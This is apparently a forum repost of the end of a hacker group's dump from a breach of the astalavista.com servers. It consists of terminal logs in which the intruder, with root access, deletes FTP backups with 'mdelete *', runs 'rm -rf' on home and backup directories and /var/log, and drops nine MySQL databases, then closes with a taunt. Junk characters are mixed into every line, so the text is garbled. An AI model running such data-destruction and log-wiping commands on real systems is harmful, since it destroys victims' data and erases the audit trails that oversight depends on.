& [) @7 k2 D2 i: h9 p226 Transfer complete.6 D& ?7 h0 K" W+ Z; l6 @4 V/ m. r
ftp> cd astalavista.com
! ]+ `3 [, M- N1 m# J3 p+ X250 CWD command successful.
G" \ J F" N$ Eftp> ls -la
' ? Z. J$ d8 }% |9 c s7 G' J227 Entering Passive Mode (212,254,194,163,2,189); k4 D* R2 M7 f/ P, Q( ]8 P
150 Opening BINARY mode data connection for ‘file list’.2 Y6 l+ o( P, R7 [# h4 B
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
" ^6 i5 |9 k8 }: R-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
. `/ ]3 _2 y0 U, o9 U. t-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2% t! _! h M- D
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar% k8 ~5 \- c* d' W
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar q( c5 H5 O" n1 o
[snip]
, v2 w2 H' O: i& p226 Transfer complete.
- S# s- `% v( i0 bftp> mdelete *
: i& b9 u$ S$ P7 } m$ v* ]ftp> ls -la
' ^( @3 P& x2 ?% B! m/ m7 O227 Entering Passive Mode (212,254,194,163,2,193)
$ S ~) `+ ~7 b" Z& P150 Opening BINARY mode data connection for ‘file list’.
{1 N5 O& r; R8 t226 Transfer complete.$ v" {# N; z7 _; s" H
ftp>
. y) q9 A, i3 s. o" X# J/ \. V- y' j8 }4 K
sh-3.2# cd /home
6 x8 U. g" V% K# c2 z7 ish-3.2# ls -la
0 t' F7 J: x' I0 A7 ptotal 120
; [& a4 _3 L. H% ?, f L& sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 f8 B# m# A' k& b2 e$ ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
" W \+ x- i1 Y1 p: O# F) edrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
/ h# F; A. J) x. \6 v-rw——- 1 root root 8192 Jun 4 03:03 aquota.group3 r# c* E1 o$ c' i: k
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user2 v. o# Q) h. o
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
" }& m1 C/ O6 g# b9 M$ ]$ r1 \drwxr-xr-x 2 root root 4096 Jul 29 2008 backup: }: x; @3 K0 O5 y) H. ^
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
2 C. W5 j' Y+ w; _3 u! Zdrwx–x–x 10 com com 4096 Apr 28 12:40 com5 y$ C; a6 x1 f8 S& h
drwxr-xr-x 2 root root 4096 May 17 2007 ftp0 n! C! x9 @" M- S
drwx—— 3 jon jon 4096 Sep 21 2007 jon7 d4 M0 J F& }
drwx—— 2 root root 16384 Sep 11 2007 lost+found
1 Y' H) c/ U- f! g5 Sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
* e% v7 m* A; U' f+ o' }drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata, D& u) @6 W7 K2 L* I8 u$ ]
drwx—— 2 jon jon 4096 Sep 15 2007 test$ b6 ^/ f- r4 h; @
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
+ E, T4 Z( v$ s6 `; Z# S
! B3 u( d' ]0 b& ?8 E" V' p" ish-3.2# rm -rf backup/
0 V) b! m6 q) o. Lsh-3.2# rm -rf backup.14161/
# u$ }1 f7 \: L2 F9 R8 xsh-3.2# rm -rf ftp/) S( i+ R8 S5 u. @& h) \0 ]
sh-3.2# rm -rf jon/& f. {4 ~) H q) }
sh-3.2# rm -rf my/
/ ]- G8 @5 w: ~8 osh-3.2# rm -rf mysqldata/8 o# e# s! X. k( ]# d) g
sh-3.2# rm -rf test/
" `* K2 N& L4 i. j4 }& [sh-3.2# rm -rf tmp/" _* u2 ~1 y- Y% g- `* ~* y* K
sh-3.2# cd ~
- \, N4 {( A; Ash-3.2# rm -rf *- v+ A6 t6 u% ~, e
sh-3.2# rm -rf /var/log/8 E8 G2 }4 z: z" g* w, U9 e
rm: cannot remove directory `/var/log//proftpd’: Directory not empty7 i& p4 I S/ X, e+ E
sh-3.2# rm -rf /home/*" |3 {- M1 S1 o# P8 L
sh-3.2# mysql* ?: l( }7 y2 B6 a" W- g
Welcome to the MySQL monitor. Commands end with ; or \g.& s! R% x- }/ b% g$ X9 e
Your MySQL connection id is 407156
: x/ {7 y# P, l4 d, a! G7 C" LServer version: 5.0.45-community-log MySQL Community Edition (GPL)
1 N( T' b" o' h5 ]& D( G$ S; \0 P7 R4 E' {4 [
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 [( n" K8 |/ U) Q' L, k" |
/ n) a) g3 q' Bmysql> show databases;
- Q |7 Y8 l& g+———————–+
j6 P" C: C+ v* B0 k% u% x- S+ K| Database |: e) A4 L/ E1 M' h) @1 j
+———————–+. K+ A7 L* K' p5 F! T G; t* \$ p
| information_schema |6 _: z) T) ]# ]
| astanet_ads |
7 B P5 O+ n' c3 ]% ?* @# Q* T| astanet_mailing_lists |$ G. I- Z; Z: X/ v( X6 ]7 ^
| astanet_mediawiki |2 ]+ H, X: v4 D4 Z+ R
| astanet_membersystem |/ j; [ S+ i! F3 C
| com_contrexx |
- j* R. o* y& C% m1 ]: ^6 y8 {| com_contrexx2 |9 E! V2 K( x$ e4 } P: r$ K/ o8 w& B4 ~
| com_contrexx2_live |# v+ G4 s" Q& c3 A
| da_roundcube |% C, g7 A+ s- @
| dolphin |
z& H6 M, b- y+ b4 k- H% d9 f& G| ideapool |
) j& U3 q6 Y$ Z) Q| mysql |3 u* K1 _* k$ h4 G+ \
| test |, X% V$ W3 x% N4 D* s
| yourmaster |
7 b% F% F6 o' i- ]+———————–+5 j& V& f; K- ], y3 |
14 rows in set (0.03 sec)
; m: ~5 e* j1 v0 H; v" `. `$ j/ z: t
mysql> drop database astanet_membersystem;! r* S# g- p$ o/ D5 c
droQuery OK, 46 rows affected (0.81 sec)
2 a+ ?. X; o( o) c3 Q
, w0 d/ F5 {- k' [8 `7 Xmysql> drop database com_contrexx;
( t; o- k. j1 jQuery OK, 211 rows affected (2.72 sec)
1 s; w3 k; v, k
: Y' u0 C7 r* l1 N8 }mysql> drop database com_contrexx2;! D& S1 ~* _: q/ A
Query OK, 237 rows affected (2.23 sec)
6 g0 N) a1 `) }+ k/ ?) `. G5 J( T- S6 A B
mysql> drop database com_contrexx2_live;
' i9 L% d. Z5 I6 J% g6 IQuery OK, 227 rows affected (7.63 sec)3 l: L9 h. \( w: ~ E, b0 p
$ v2 K- k* ?; u& H2 w, j1 N; z
mysql> drop database ideapool;
# ^2 p- c! G! {5 C" nQuery OK, 69 rows affected (0.19 sec); z9 q* T' I& r1 t N) G
" z7 V" D' H& V; F$ U3 cmysql> drop database yourmaster;* ^# \+ G' Y+ o$ x2 R# x: l; X1 a
Query OK, 158 rows affected (0.55 sec)
& R. `! ?7 X; ]" }% H4 z% T, Q f1 z; c S+ j
mysql> drop database astanet_ads;
) k( B. e1 I& P7 {& I( @& KQuery OK, 9 rows affected (0.11 sec) n% r3 W1 u) I# A
7 K2 R H0 W) q# D1 Kmysql> drop database astanet_mailing_lists;" i& u+ D) ^, ?
Query OK, 24 rows affected (1.47 sec)
* \" a4 V8 R7 Z- S$ A/ t
1 P: X" T' x3 j) Ymysql> drop database astanet_mediawiki;
' D! }( c1 }" S2 Q1 M" W- k, L. n; SQuery OK, 31 rows affected (0.51 sec)
9 R% ~1 s5 J, V6 j6 U
; e3 C$ A& ]& cmysql> show databases;+ C' f7 p2 K: Y+ c6 x8 y
+——————–+9 ^& y7 W+ L: Z: R' l
| Database |
, [+ y6 b2 c3 N6 _) q0 v1 n+——————–+
/ Y, `9 ]% C: C( \* l| information_schema |2 t" `. i2 O% E1 I6 X# s* N# z
| da_roundcube |
% c+ _* i2 V' j& D* m8 U2 P" p| dolphin |9 a# \8 I! d" f0 s' [ _2 G
| mysql |3 r0 x6 g/ h7 t8 d* u
| test |: h/ H7 G) [8 `3 M/ ^+ o k% h
+——————–+
/ ?5 P' Q9 Y1 c& T* N* [5 rows in set (0.00 sec)
+ l7 B/ ?5 S4 f) | N5 g5 E3 G. k7 n3 C- S
What a journey! We’re not sure exactly why the “Terminator” had any influence on
j/ f4 v1 j7 |2 I qtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the7 I9 ^5 ^* D3 V# Q7 C( n
wrong to say this pack of morons *wont be back*.
9 s5 `8 M4 n" K4 q) y; }: ` |
发表于 2012-11-6 21:07:34
收藏
支持
反对